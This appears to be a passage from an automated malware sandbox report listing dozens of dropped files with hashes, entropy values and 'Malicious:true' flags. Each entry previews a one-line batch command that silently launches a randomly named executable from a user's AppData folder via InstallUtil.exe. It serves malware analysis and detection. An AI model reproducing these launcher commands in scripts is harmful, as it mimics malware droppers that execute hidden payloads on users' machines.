                                                                                                                          SHA1:CD9B8751305E7ACB88769FB333A73B907D8A339C
                                                                                                                          SHA-256:CFD9F6DCB29B6410F9A8AB159501BA3E809280CCCB94228AD06A722CB47904C1
                                                                                                                          SHA-512:78A422DDDB4AC2F1B294F377D7F12220965E1593747878C4E8BA802AFE304660DFDE3A77F26EB455C28A99287B64CA3C448E231968F9AF966FE84F1CE72AD181
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\TSj4lbXBm0ozR2JnFqSdYKyt.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.936057482154531
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5RgnEUi+OO4AHFn:fE1923LUi+THF
                                                                                                                          MD5:37684A1983194E7AEE976FC7FCE8E2CE
                                                                                                                          SHA1:FABD8A34C0973CA32BEA116F599D200563F8ED64
                                                                                                                          SHA-256:E0B48E199A095BD4126B20AB698197AC15C33BC0F53A11DEF0E85889CD57BE8F
                                                                                                                          SHA-512:C1F9B00FA0F264EE6D92205D46D05D1164C4235459AB9E09E279F4D06F9842EA2D08AB9548E896B52015FCE76A43277DE46EFF2361D7A313E0440327EB930178
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\tEoXnSB5a2gG0aMGbYjuRHfY.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.91508703894938
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5uguxwS/qhwl:fE1923u6xW
                                                                                                                          MD5:15FB2817C1D4BA80E43C16C2AE7B74A0
                                                                                                                          SHA1:2C445FAB0C05CD1C6851348DA5DA444D35484690
                                                                                                                          SHA-256:68EFD489D994D05CF6DAC77545F4BF298F23FE56DF8B6E45539DF932851A9B6A
                                                                                                                          SHA-512:CE96C14E843FFB46F094CCFFFD17674F32C1D0F8DD5881A0BA5CADAC4F536603A4B940D61587130D514608F9C080C7D6386C2BA898ACB3B4A9AFDE5DED063A8B
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\KF9G3AcCbu7Zl4IuQK8qDucc.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.9830140032660015
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5dRQ9yX8c3saBAsn:fE1923ToyX87aJ
                                                                                                                          MD5:B68F9BA8AC99C38E073AB63AFFB1BE99
                                                                                                                          SHA1:0FC6B8564780600DFAFEB0E92BBECB1D33634CC8
                                                                                                                          SHA-256:C83EB422A6E67F11A15FDF848D9EAEEDCC87C9B454B4BE773221DDB0EED7B9B8
                                                                                                                          SHA-512:9CCF7B64087B1D604F6452B6F0371BA4DDC230C081DF359FACA499D0A321D13E06B68F340789F4C7EFB5A04057882518BBCFF7FDA10900184AA218C1FC91DF0D
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\84uXgYSh2YRu2JRIl1mBIrr0.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.850343196440246
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J58jMUydBEnHIKm:fE19238s8o5
                                                                                                                          MD5:4DB964FBAFFE2833802FF6D823E37B26
                                                                                                                          SHA1:00E16CAC3A1DCA744088AA67315F8D3DA459B713
                                                                                                                          SHA-256:0A993B9679AEBB924600F306833B5E1F998303C565A0E082AD8A66677A4CF421
                                                                                                                          SHA-512:F62793167EB45A619313944497372468EE89544925B4B9DB67C8ABCFCEB42D313EE115F5C2889CCE5C9FC36A612FF85E9A1CF9F6BBDD7DD33A2D702825C0F502
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\YozXwrtOqW83cBaBYKUomag4.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.707855075711144
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5QwWx9R1eOvn:fE1923QwWZb
                                                                                                                          MD5:65941B1AC4A75B7A6B13D7178B0A2F34
                                                                                                                          SHA1:C4DC562F894144A78D2A0D8A6B25D2AE9759AD70
                                                                                                                          SHA-256:BA006F9547A96BA55F0C10829C47C43577E40F0244E9DCFEC210B9CE6557522B
                                                                                                                          SHA-512:CC23EF9E58FF546D4D8BB2C5C1159FDFC350C7C0BCB43FAC4B846657C010578FB97CCFC04108C29B0A5DE4DD91A0E439AC9E380C4EB77A49AA957E0CE1F5CD32
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\uUsTsPesltkS6XkccPV4r1be.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.90987949642652
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5c9Cmw1Fx+o4iFn:fE1923cM+oVF
                                                                                                                          MD5:68C56C302C0F7E13C441A2202413AA5C
                                                                                                                          SHA1:FF3765050BF25C2E3428B605FC13EBD7C1F66CD8
                                                                                                                          SHA-256:A8ED02A26297DCC5CB2F3B4E3FA38FD1D6B68459841B1490B6D25FB50C408F2F
                                                                                                                          SHA-512:4B9834D20914F3C98E2AAEE509199F39872296A9459A67E2DA86FBDFAD7157D179D86DBEA7F2DC6DC84DD13538391F8054C5E59DFCD4D606FAF2E2AFE15D7227
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\yXBgs4CMjv6Y3CFxbTDDkpre.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):5.032642651654438
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5PclgoG3fRLQkdan:fE1923loGJLQD
                                                                                                                          MD5:A34A098FE510C9F271EAB9D9E464FF00
                                                                                                                          SHA1:453AD320A2E629722B1169A0834DB455CFC0E715
                                                                                                                          SHA-256:83303A4C62D814DF0F049C06F10A6BC6072C42F43A9AE5DDD7A0EE08CE2B4302
                                                                                                                          SHA-512:742C93E95F6B55DC7DBF0510BD78DBDF56B01939A42A9BDBAF71D00E67B54C39E51413285406F4D1D9A7BB985FD057E52B5F54411F431B43044BF6DC3652288C
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\j9oiPedoYJq65MrsMIBEWZ24.exe" --silent --allusers=0
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
Size (bytes):70
Entropy (8bit):4.746880788794846
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5GILWNhLDiTyQUSBGLAdm:fE1923GIuLDiTu4m
MD5:C4970D8180C484770E50ADF0C481D6BD
SHA1:6EAE4D7F3C848258012EF2937F3D704AAEF54DF7
SHA-256:F2BF2D14055505B184F6400E9141AE1D3885C6F7FBB3F8726BD867E472C52415
SHA-512:D7525C16588E80800F80A4FE1912F78B385D6C86C721C48A0EA420A4DBCEAC7A662F0B346881958C470B7475C8845D1B4F1B2C0DE9E6F410C1A9BC10FAA0047E
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\cmnshDDu9usrWvW5qWukljAj.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.802227974236665
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5EOfdgws4l:fE1923EOqNe
MD5:2CB868E710AFDE2259E649B39EA037CC
SHA1:705122C6E995F5104FD92D7307C0FF920B213747
SHA-256:4C6B1D8181E5E4EAD622B9AA239DA6B7FDA1709F3E8289729D6EC9C356674A51
SHA-512:3DC91673CF262F494FF44636443E353C9AF7121D3F09DFAD334E987EFB04CD67201A56F9A7C0D6B57345EBB6D58456C1192673B4E022105B75E60490C4DCA9AD
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\arAAytPAHIBxEUE8lqY8jFUv.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.961445788918474
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5szvgPOgackm:fE1923s8GgaY
MD5:3D5EE83330FE7F48415E0DD9C29069B0
SHA1:9CBA0A69F16571A2CD27F529681ACF1E016980C5
SHA-256:C26ACFB5D234D1A8D57568B3976903B517CBFCEE4D45F9F48762622BBC7BCD1D
SHA-512:E0E81A665E8962AB47542E3536153475D37E186B3D8EECAD721000822D4E3D26C69EA65E679310DDFE9F9051F3223B9ACD4D29610D80187F9A535D5D827E0CD6
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\Imc6gJg8H4cjDDr1J0xEqhfy.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.939877574570948
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5BckW7aNln:fE1923Pi4
MD5:17A04D31CA587B0E738260ED07E5DF1E
SHA1:2533EE5D4FD604914940BC32E59F45B14AAB4D73
SHA-256:4292D619DBC3600AC58CB7BB2E1EB16F6BAB83DC038E91517C4B022B75928A00
SHA-512:AE9A3E1715064EF34F981B1E5A7EE91753A4B04064215A18CB042FDB4E32C4CA175936BF829131C1A56570800BAE601CC6725DA043A71D0C5329EDAEDAE6A166
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\dyzUSu8swmONfKr10ailCBUT.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):5.0331536461849575
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5CkNTcS51km:fE1923CkNTH6m
MD5:8553AA3A02388600D8175E4B455436A7
SHA1:70D6B6D5D5781A0895F3A5F5B9F7D9C0FFF0EFB5
SHA-256:7021AAF108DD41A3EB2EC8535770A431BF7D3218A205B40EDAF1D41C614C92EA
SHA-512:7D2FD08975CA95C8419B734D79C781D3F188ABA9BFFA06A88CF9E7FF5E0CCB164BCDA07EEF8A4E7802A1120005948046296F710C7B7CEE7BED3C0F5B133FD755
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\gJVExh69UXMYc2ZOtdjmxeSQ.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.8527366392836635
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5113Gt1MmpBEFn:fE1923/3GFpeF
MD5:842D1340425F13D77D738552C964D55E
SHA1:C90F7948C3D1E51252F20E5A8A35C955ED2EB73C
SHA-256:B1CA80CD727DA14DA63D1B5BD6A58900CEDC2B59259863ABB9EB358712599C59
SHA-512:85ED3682BC29E1E79ADA230EC8F6E76E4F4B98E3986CE5A80D3305FD425AB2EDD48C4C84574C8869AAE30C42390AC822307385DB66D173AF84FFA12B9FADA407
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\PPRbCMR3JwR3Rpdv3d5rSgFs.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.829372753235095
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5ptWt6t2wDKICln:fE1923DWgEwzs
MD5:93783DB88FEA91AC2857912FF489DAAB
SHA1:EB71D49F65CA806B2ABF3A1242279C9DA01DD8B7
SHA-256:992CC94C55EBBFA3493992EB5AC50F10D8AC533FD4017385D12155CA554047CA
SHA-512:FDF327A69C82CD3F565B750BEB60660AC9D5EB78F34C005E6F5E10F16652078D8E48DD6B175B71CDADEC050A04D5DD9C2C934E5FDF511BBCE003275B60B8A977
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\LHg0H4yHSfuTfUKbSoOyunge.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):5.000801324663668
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5ic9dUBqUpyGAJFn:fE1923i+WBnyGMF
MD5:3C0227A4F0294611ED1CCFA39757B197
SHA1:2BE094D6AF256A29E1A74FFCE415EC54D0286315
SHA-256:13CA1340C7B5CD397D0050CFE37867F8FC24E5B16D1888818E21F56055498CD2
SHA-512:D832863869452AA8FAF6019263DECC24B01192C5D8DD80212D92A5A9D1B1A873C47C66CB80C87FBEE0C4D69CAB791E8E7E91FFB427F8DB40E7FC97506681060E
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.795224760012764
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5QR+PCKMiYcL4iF:fE1923QReCUYcL
MD5:57D47B12D08BBDAD740567470AA242CE
SHA1:0100017E44AD1517CD16253948873BEF6F4D1453
SHA-256:CC6F16956D7688E1A0BC4EC3526086E4E4235FD4C17DB17685DF60A02C18514D
SHA-512:F08A5DC5AA971DF9F15A8F23B35F77658D4BDC6997512A3E92A16EA0A18F1E1D419A34F870751538E17A17EF2FF0470D59D5D3D5CC73092DD2315EB96F8FE5D3
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\5uaGL394o1URo4OLi5h5u5tB.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.947439360470673
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5uDrM0mzMA76ViF:fE1923ufMhMAZF
MD5:B732BEAE37783A302FCE19EF52215A68
SHA1:8590624C63CD8CD510EBDAF66EB9EBC7BD560B54
SHA-256:2749150342DB48F6BD7C74C5D5D372605CFB015FE9512D82C22BA3919A575D02
SHA-512:CC53A4363FD4492A11727D9BF191FCBF843F858EEF159F489B01ADAD3A2111C9EEA798FF0153DD38DFAB0C3C01DCDEF37F8B49D37CDB8E133A717341C91B31B7
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\Kf4hiHPq92VEGie04P7QtHUU.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.884491189662577
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5mSOAvkmn:fE1923mrnm
MD5:0B54229399BB0A32C4D4BD7430FFA8DC
SHA1:80F158D5826103E72188618FA04E63E0936CA53C
SHA-256:D989D32A599094DA001581766892E1CBC3F7A343DF9FABBE61AB9133E156FF5E
SHA-512:579348905482A932EF99B015061AB4F3F57FB32727BE02BFF476EBF15FCA231902679C208D83E1098D162B0A5CCE75FE73199DC9316E182A506190CD5E703FA0
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\CZMrbdv3aANr0IrdmBiWfjaH.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.896701946409339
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5f41G1czu13kiF:fE1923+z63JF
MD5:06A5C6C7F99A7EB0DC98461287BBEB46
SHA1:6CC017AE0D79B9F6D81B4CE2D000D0E0CCB714BD
SHA-256:4FD461B67E3FA147C7236B371DE971104CE1317C451903FC7622E2B8837A12B5
SHA-512:578D0A956F3F2875FCA70CB4A5C98104936B3BB111890BEEEEF656D24C37088CDFD02E4D9486EA23A47CB2914DDAD8BD56EEE870062921146D08B4AF426540A7
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\zWNPblMz8jR3viBabeOSPbWa.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.943658467520809
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5BwFOQ6Mmln:fE1923npMi
MD5:51301864BA3657104ABC8FF2E52D721F
SHA1:4183381B58BD942D5AA12F3C274BAB18032DEC91
SHA-256:09B7D4F78F815B0F5DEB5FECBBA0F183D903BECC334E20E9DA59C7B5FEDD00BB
SHA-512:81B0212DD1C4CC59C8567FE039CCB6D584E598F5B862B68BD2DAE3FEE7DF33EA2975E641795C6825F762308A0C2DEA44BDD9471675E4DB4D0775F0CB2B46173A
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\dUxbeTroGHi03yY2SNfS5bOl.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.91508703894938
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5vdpT4nUJgIpm4mn:fE1923FpPJgUc
MD5:C02835051B4210F6F278684942DF8E68
SHA1:6725CD07B0C2DF86F428BC2CCF183CC89C4D8291
SHA-256:32C8A8DB2848D379D29ABD5DB5F15DFA88BFF54FE4BD58831970CE7DB466253A
SHA-512:E0005F47CAD9DF2414E612E565B41A51F602F9EFDE21F6FB0E4C08726D7DA9E06CFE0613BAA5B267DFB7EA91D13DCE0E5603EBF8F39386D596E0ABCAE58C83D0
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\J8LomUCEiQeMvIGqlnqM0LZ5.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.845135653917384
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5Ew0SoAdX/NEJPneF:fE1923EwLddl+neF
MD5:E24510AE71186B8B408F44940A7A28AF
SHA1:991A2BD09358AA5FB069458687701C6EAE7BECE8
SHA-256:C9F2A4F471CED174823E334C08F5B0A39CDB70A14F8BD54FE3025C5246D0D507
SHA-512:9762F304C55A4782279938CAB7413C4C4C950EDB6010FADC5543ED4F7CFF7C3FD804F371312D18D8C1F7FFE3C1D7DB558C6CDEA7102ED0BB84268312C9E5A447
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\aUwbp4hWfsJe82ZKgal8jxB3.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.983014003266001
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5OX3RQcmcijUBAdiF:fE1923OHRjmcioBAdm
MD5:436C213EC74B0B1FC8C7A0861F877119
SHA1:761CA98CC773DB86F2757F0742D516BA6BA59432
SHA-256:A19F9DA67EDEFE2060EFE84182E9A37A99132FA371EBB055897AE835E2E1FE62
SHA-512:7719695B765DBB853695E104291835EF0F766BE138D990FB1E61E3B14851EB36A3111D1B80B5873E29CA786540AF0F2D51AEDCEC232AB9369D1DC53F9238E2FE
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\kW8yqxmpQubjD4ulwCtyGF1P.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):91
Entropy (8bit):5.0638376026574035
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5dCtZTp3pTQDcCSkdan:fE1923ileAD
MD5:165E6C4684A6B25DE3BCB621CE0303B9
                                                                                                                          SHA1:56A05A322C23585760E97382F9D0BE5FEA0E8EDD
                                                                                                                          SHA-256:44F6B4D0E4E5B6370D0423FE3DC0099713EC34EEDA459E13942D35F2ADB068C7
                                                                                                                          SHA-512:26AC3CE0289AFB12FD042D9238BB7B27BD4E10200E0D7F51F2DD23F708E04BFD6D7639C4D41A62940D060AFF95EA49BC2BE7DEC781FB7FEA3FC6909F724DC509
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\xgPBlpX67jxMBR1TQvyDxw3Z.exe" --silent --allusers=0
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.925273374980767
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5K/lcdu6gU9:fE1923K/lcQ69
                                                                                                                          MD5:B7A2F9421E22EACCCBC05C6858197FFC
                                                                                                                          SHA1:71FC366976849F0ECB4840E537CB844213F47E91
                                                                                                                          SHA-256:682F0862E8C77C8B5CA5D839B8BB7BB5A54673BB8BDDAE0D20E4F29D30D653BF
                                                                                                                          SHA-512:D65F547F8FB8DDDC2958631754B6A1C3A0B0D9A754D696C491BAAF2A311264BFEF47F05BFBE834B71CA86D3B5C5E6C149B91F189D31625F00DB7D6D422750081
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\oV6dHd8Uj8abAaMmxW4y29GG.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.875731503204189
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5Xd5GfWgh8dm:fE1923N5Gu4
                                                                                                                          MD5:48F51B916A9F4D9D7F5C1BBF03B95506
                                                                                                                          SHA1:D8B0568923C149DA31DE90A79B77D2BF9911F82D
                                                                                                                          SHA-256:7C9BADE2D91F28283C51C12852FAEE8C36EDCF8F4957640E1696D376A465B523
                                                                                                                          SHA-512:59E609C9BAAFD943337DDD62780DAEB7E152B025B0ECEEDF2D9A4A2792BE1CADBCC4F2557EA8D92B0148890C2479F3E7D1B9187B0A3142680A5F1CA30D981D4F
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\r8s8W6BwO9zs4dtTCMpyOk6D.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.961445788918475
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5wNVkvOlrhx8UTq4iF:fE1923wNAaxFO4iF
                                                                                                                          MD5:124A2C9E31A3687F77AFE112D8D494B5
                                                                                                                          SHA1:2E2E231F4131FA8253F822AFA32A2AE29A4EC80E
                                                                                                                          SHA-256:545882AD57CA434F0F90471F890E9C7DB057A12224DE4C10C308D2F82DA7204D
                                                                                                                          SHA-512:CBB5D238D85A5545595699989ECF3BB6A184B099A9858B883F791C914155777D3CD0166CB461BA897C465D0177C4D2CBE526C3A1A30A924F546AFB6F75248720
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\UyY0AJkHrNf9ELHT0hUQo1vI.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.988590567916905
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J50+achln:fE19230ahl
                                                                                                                          MD5:CAE43F37D81F02246CECF4ADBCAC36E1
                                                                                                                          SHA1:84521B94F881EE1988DF13FD48AB08D56585DB5C
                                                                                                                          SHA-256:373647CF8E0E0501BE8B376A4D3F8C7B888EDC36E1018C1D813A19460379F17B
                                                                                                                          SHA-512:80D3D56572C76E9052942E368146722C9184B936F9C0AC9313950D9798AACB4D48B5021251C0FE24CBF00FC7E31B04B2E8E24E2B55EA037F44E54C24BBA829D7
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\Q54LGmnZmhktpXP3y7EOrtRY.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.866374045603423
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5iCOVkZ3diiIKNFn:fE1923iCOQEKX
                                                                                                                          MD5:116990468FF0D8D4E8D40FD277015A15
                                                                                                                          SHA1:30EC7D6377A18070D2D26904A06B454E861DF4AF
                                                                                                                          SHA-256:3D1F072865516136665F6E0E4A50E68C3F78AD9EB21E53B16FB2D3E560E8202C
                                                                                                                          SHA-512:43DFA735CCED10025B0AE50122992C79E9FD49069E640C28258AED3E6A6E846FECB9BE16DB8553F4EA3EF4884FAB3AD2BE73897D8CFFE966C86774582B62B905
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\GgkHyxCAI1v6YgxGdG6aBohl.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.9328743603470455
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5IrMyIt4SSkcF4mn:fE1923InPl
                                                                                                                          MD5:0E43E764A951916B288184A7A3CB5C2B
                                                                                                                          SHA1:A6CDA1538D4A3C89021C5E291179B4E463BF376D
                                                                                                                          SHA-256:14DCEDC188CF35B7BC2CA61223E1F140FB7553186C3D7C6C405803D92B637715
                                                                                                                          SHA-512:EB606F9275AD25570C4C9760C89AA1C798354B1EF3BA0525FB45FB55C2BE4200990D7FCD2BF5656DBBB48F9C9A377882BAA753CE9D76F94897233E502D69E9DE
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\mNie156DZkBHGFa0A77A9lus.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.018588646061332
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5/1Cj6w/PudAln:fE1923t2b
                                                                                                                          MD5:A52E10C3F69141A3B40ADE046072BDB4
                                                                                                                          SHA1:AA9E231EF67B4D96143874D9C72FFEC28E81C1DB
                                                                                                                          SHA-256:02A4E9D38E25AD246F07F02A2B23EAD1073174863C5A502D593BB3894A7D938A
                                                                                                                          SHA-512:99131145951832E8CD2EDF07455212730ED01EE2526768C49FC823DBA43D7A8F4FC8DB825AFE7B2EDF6D3F100004D926B31D84A92C2EEAB000222649B31F405F
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\ZSwgvRB1MVwrU7ijKh97GNss.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.961445788918474
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5QYS4H3boGiwdnoLAEFn:fE1923QYzc7PJF
                                                                                                                          MD5:F676443E653960132E9CEB51549265AD
                                                                                                                          SHA1:CD2444256027A2CB1C130A0C7DBBE25C3893DDDE
                                                                                                                          SHA-256:8989FC069C1342B23AC32157DA55C8049BC328E9BFED5D8929F6D9A0FFC31A4A
